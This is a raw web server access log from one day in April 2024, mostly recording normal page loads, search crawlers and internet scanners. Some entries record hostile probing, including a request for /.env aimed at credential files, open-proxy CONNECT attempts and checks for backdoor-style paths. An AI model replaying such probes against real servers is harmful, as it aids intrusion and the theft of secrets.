185.122.204.242 - - [15/Apr/2024:17:20:30 +0000] "GET /login HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203"
167.94.138.2 - - [15/Apr/2024:17:35:49 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:17:35:50 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
91.92.245.67 - - [15/Apr/2024:17:49:08 +0000] "CONNECT api.ipify.org:443 HTTP/1.1" 400 157 "-" "-"
23.236.204.19 - - [15/Apr/2024:17:55:26 +0000] "GET /Online-Payment HTTP/1.1" 200 3688 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36"
23.236.204.19 - - [15/Apr/2024:17:55:27 +0000] "GET /css/bootstrap.min.css HTTP/1.1" 200 24334 "https://www.travellineholidays.com/Online-Payment" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36"
23.236.204.19 - - [15/Apr/2024:17:55:27 +0000] "GET /css/custom.css HTTP/1.1" 200 4214 "https://www.travellineholidays.com/Online-Payment" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36"
23.236.204.19 - - [15/Apr/2024:17:55:28 +0000] "GET /font-awesome-4.1.0/css/font-awesome.min.css HTTP/1.1" 200 4724 "https://www.travellineholidays.com/Online-Payment" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36"
23.236.204.19 - - [15/Apr/2024:17:55:28 +0000] "GET /css/plugins/social-buttons.css HTTP/1.1" 200 2011 "https://www.travellineholidays.com/Online-Payment" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36"
23.236.204.19 - - [15/Apr/2024:17:55:28 +0000] "GET /js/jquery.js HTTP/1.1" 200 33297 "https://www.travellineholidays.com/Online-Payment" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36"
23.236.204.19 - - [15/Apr/2024:17:55:28 +0000] "GET /js/bootstrap.min.js HTTP/1.1" 200 9255 "https://www.travellineholidays.com/Online-Payment" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36"
23.236.204.19 - - [15/Apr/2024:17:55:29 +0000] "GET /fonts/glyphicons-regular.woff2 HTTP/1.1" 200 68200 "https://www.travellineholidays.com/css/bootstrap.min.css" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36"
23.236.204.19 - - [15/Apr/2024:17:55:29 +0000] "GET /font-awesome-4.1.0/fonts/fontawesome-webfont.woff?v=4.1.0 HTTP/1.1" 200 83760 "https://www.travellineholidays.com/font-awesome-4.1.0/css/font-awesome.min.css" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36"
23.236.204.19 - - [15/Apr/2024:17:55:30 +0000] "GET /favicon.ico HTTP/1.1" 404 4571 "https://www.travellineholidays.com/Online-Payment" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36"
45.79.168.172 - - [15/Apr/2024:17:59:08 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 zgrab/0.x"
66.249.79.35 - - [15/Apr/2024:18:02:30 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
167.94.138.2 - - [15/Apr/2024:18:05:44 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:18:05:45 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
45.79.181.179 - - [15/Apr/2024:18:07:31 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.79.181.179 - - [15/Apr/2024:18:31:21 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
172.105.128.12 - - [15/Apr/2024:18:34:44 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.94.138.2 - - [15/Apr/2024:18:35:41 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:18:35:41 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
192.155.88.231 - - [15/Apr/2024:18:40:26 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 zgrab/0.x"
52.167.144.186 - - [15/Apr/2024:18:43:05 +0000] "GET /sitemap.xml HTTP/1.1" 404 4571 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
128.140.107.230 - - [15/Apr/2024:18:49:48 +0000] "POST / HTTP/1.1" 403 199 "-" "Go-http-client/1.1"
192.155.90.118 - - [15/Apr/2024:18:54:24 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.79.168.172 - - [15/Apr/2024:19:01:42 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 zgrab/0.x"
172.104.11.46 - - [15/Apr/2024:19:04:32 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.94.138.2 - - [15/Apr/2024:19:05:40 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:19:05:40 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
51.159.23.43 - - [15/Apr/2024:19:10:55 +0000] "GET / HTTP/1.1" 200 5069 "-" "-"
167.94.138.2 - - [15/Apr/2024:19:35:43 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:19:35:44 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
128.199.113.173 - - [15/Apr/2024:19:50:23 +0000] "GET /.env HTTP/1.1" 404 196 "-" "python-httpx/0.27.0"
128.199.113.173 - - [15/Apr/2024:19:50:23 +0000] "POST / HTTP/1.1" 200 1971 "-" "python-httpx/0.27.0"
167.94.138.2 - - [15/Apr/2024:20:05:53 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:20:05:54 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
45.79.168.172 - - [15/Apr/2024:20:17:46 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 zgrab/0.x"
172.104.11.51 - - [15/Apr/2024:20:18:03 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
69.164.217.245 - - [15/Apr/2024:20:22:36 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 zgrab/0.x"
172.105.128.12 - - [15/Apr/2024:20:22:44 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.238.221.228 - - [15/Apr/2024:20:32:50 +0000] "yjlkqohu" 400 157 "-" "-"
104.238.221.228 - - [15/Apr/2024:20:32:51 +0000] "yjlkqohu" 400 157 "-" "-"
104.238.221.228 - - [15/Apr/2024:20:33:01 +0000] "zovmsfqy" 400 157 "-" "-"
104.238.221.228 - - [15/Apr/2024:20:33:02 +0000] "zovmsfqy" 400 157 "-" "-"
104.238.221.228 - - [15/Apr/2024:20:33:32 +0000] "wuaowqkw" 400 157 "-" "-"
104.238.221.228 - - [15/Apr/2024:20:33:33 +0000] "wuaowqkw" 400 157 "-" "-"
167.94.138.2 - - [15/Apr/2024:20:35:45 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:20:35:46 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
157.245.176.143 - - [15/Apr/2024:20:44:48 +0000] "SSTP_DUPLEX_POST /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ HTTP/1.1" 400 157 "-" "-"
198.74.56.46 - - [15/Apr/2024:20:51:45 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 zgrab/0.x"
192.155.90.118 - - [15/Apr/2024:20:52:08 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
152.42.193.255 - - [15/Apr/2024:20:53:46 +0000] "GET /ab2g HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
152.42.193.255 - - [15/Apr/2024:20:53:46 +0000] "GET /ab2h HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
152.42.193.255 - - [15/Apr/2024:20:53:47 +0000] "GET /alive.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
152.42.193.255 - - [15/Apr/2024:20:53:48 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
152.42.193.255 - - [15/Apr/2024:20:53:48 +0000] "GET / HTTP/1.1" 400 657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
152.42.193.255 - - [15/Apr/2024:20:53:48 +0000] "GET /t4 HTTP/1.1" 404 196 "-" "Mozilla/5.0"
152.42.193.255 - - [15/Apr/2024:20:53:48 +0000] "GET /favicon.ico HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
152.42.193.255 - - [15/Apr/2024:20:53:48 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
152.42.193.255 - - [15/Apr/2024:20:53:48 +0000] "GET /teorema505?t=1 HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.79.163.53 - - [15/Apr/2024:20:55:11 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 zgrab/0.x"
192.155.90.220 - - [15/Apr/2024:20:55:28 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.94.138.2 - - [15/Apr/2024:21:05:41 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:21:05:42 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
192.241.221.43 - - [15/Apr/2024:21:30:18 +0000] "MGLNDD_165.232.190.148_443" 400 157 "-" "-"
45.79.181.104 - - [15/Apr/2024:21:32:46 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.94.138.2 - - [15/Apr/2024:21:35:40 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:21:35:41 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
198.235.24.98 - - [15/Apr/2024:21:41:03 +0000] "GET / HTTP/1.1" 200 5069 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
20.55.53.144 - - [15/Apr/2024:21:45:03 +0000] "GET / HTTP/1.1" 400 657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
167.94.138.2 - - [15/Apr/2024:22:05:38 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:22:05:38 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
107.172.106.230 - - [15/Apr/2024:22:20:26 +0000] "GET / HTTP/1.1" 200 4571 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.0 Safari/537.36"
107.172.106.230 - - [15/Apr/2024:22:20:27 +0000] "GET /css/bootstrap.min.css HTTP/1.1" 200 24334 "https://travellineholidays.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.0 Safari/537.36"
107.172.106.230 - - [15/Apr/2024:22:20:27 +0000] "GET /css/custom.css HTTP/1.1" 200 4214 "https://travellineholidays.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.0 Safari/537.36"
107.172.106.230 - - [15/Apr/2024:22:20:28 +0000] "GET /css/plugins/social-buttons.css HTTP/1.1" 200 2011 "https://travellineholidays.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.0 Safari/537.36"
107.172.106.230 - - [15/Apr/2024:22:20:28 +0000] "GET /font-awesome-4.1.0/css/font-awesome.min.css HTTP/1.1" 200 4724 "https://travellineholidays.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.0 Safari/537.36"
107.172.106.230 - - [15/Apr/2024:22:20:29 +0000] "GET /js/jquery.js HTTP/1.1" 200 33271 "https://travellineholidays.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.0 Safari/537.36"
107.172.106.230 - - [15/Apr/2024:22:20:29 +0000] "GET /js/bootstrap.min.js HTTP/1.1" 200 9255 "https://travellineholidays.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.0 Safari/537.36"
192.155.88.231 - - [15/Apr/2024:22:23:10 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 zgrab/0.x"
45.79.172.21 - - [15/Apr/2024:22:23:24 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
66.175.213.4 - - [15/Apr/2024:22:32:48 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.94.138.2 - - [15/Apr/2024:22:35:38 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:22:35:38 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
80.75.212.75 - - [15/Apr/2024:22:42:57 +0000] "CONNECT www.google.com:443 HTTP/1.1" 400 157 "-" "-"
164.90.200.159 - - [15/Apr/2024:22:51:36 +0000] "GET / HTTP/1.1" 400 255 "-" "Go-http-client/1.1"
45.79.163.53 - - [15/Apr/2024:22:55:36 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 zgrab/0.x"
167.94.138.2 - - [15/Apr/2024:23:05:39 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:23:05:40 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
45.79.168.172 - - [15/Apr/2024:23:06:52 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 zgrab/0.x"
54.36.149.107 - - [15/Apr/2024:23:08:51 +0000] "GET /robots.txt HTTP/1.1" 200 109 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.168 - - [15/Apr/2024:23:08:52 +0000] "GET / HTTP/1.1" 200 4588 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
167.94.138.2 - - [15/Apr/2024:23:35:39 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:23:35:40 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
66.249.68.4 - - [15/Apr/2024:23:44:02 +0000] "GET /dining.php HTTP/1.1" 200 4326 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:05 +0000] "GET /assets/css/font-awesome-pro.css HTTP/1.1" 200 77788 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:05 +0000] "GET /assets/css/bootstrap.css HTTP/1.1" 200 23695 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:06 +0000] "GET /assets/css/animate.min.css HTTP/1.1" 200 5003 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.4 - - [15/Apr/2024:23:44:06 +0000] "GET /assets/css/magnific-popup.css HTTP/1.1" 200 1839 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.4 - - [15/Apr/2024:23:44:07 +0000] "GET /assets/css/jquery-ui.min.css HTTP/1.1" 200 7631 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.4 - - [15/Apr/2024:23:44:08 +0000] "GET /assets/css/nice-select.css HTTP/1.1" 200 976 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.4 - - [15/Apr/2024:23:44:08 +0000] "GET /assets/css/main.css HTTP/1.1" 200 28267 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.4 - - [15/Apr/2024:23:44:09 +0000] "GET /assets/css/swiper-bundle.css HTTP/1.1" 200 4428 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:10 +0000] "GET /assets/css/backtotop.css HTTP/1.1" 200 515 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:10 +0000] "GET /assets/css/flaticon_royel.css HTTP/1.1" 200 576 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:11 +0000] "GET /assets/css/nouislider.css HTTP/1.1" 200 1610 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:12 +0000] "GET /assets/css/slick.css HTTP/1.1" 200 592 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:13 +0000] "GET /assets/css/meanmenu.css HTTP/1.1" 200 933 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:14 +0000] "GET /assets/css/spacing.css HTTP/1.1" 200 2153 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:14 +0000] "GET /assets/js/vendor/jquery.js HTTP/1.1" 200 30972 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:15 +0000] "GET /assets/js/bootstrap-bundle.js HTTP/1.1" 200 23042 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:16 +0000] "GET /assets/js/settings.js HTTP/1.1" 200 2236 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:16 +0000] "GET /assets/js/isotope-pkgd.js HTTP/1.1" 200 9888 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:17 +0000] "GET /assets/js/backtotop.js HTTP/1.1" 200 470 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:18 +0000] "GET /assets/js/sidebar.js HTTP/1.1" 200 519 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:19 +0000] "GET /assets/js/nice-select.js HTTP/1.1" 200 1059 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:19 +0000] "GET /assets/js/main.js HTTP/1.1" 200 4371 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:20 +0000] "GET /assets/js/meanmenu.js HTTP/1.1" 200 3466 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:21 +0000] "GET /assets/js/jquery-ui.min.js HTTP/1.1" 200 67715 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:21 +0000] "GET /assets/js/swiper-bundle.js HTTP/1.1" 200 37679 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:22 +0000] "GET /assets/js/magnific-popup.js HTTP/1.1" 200 7370 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
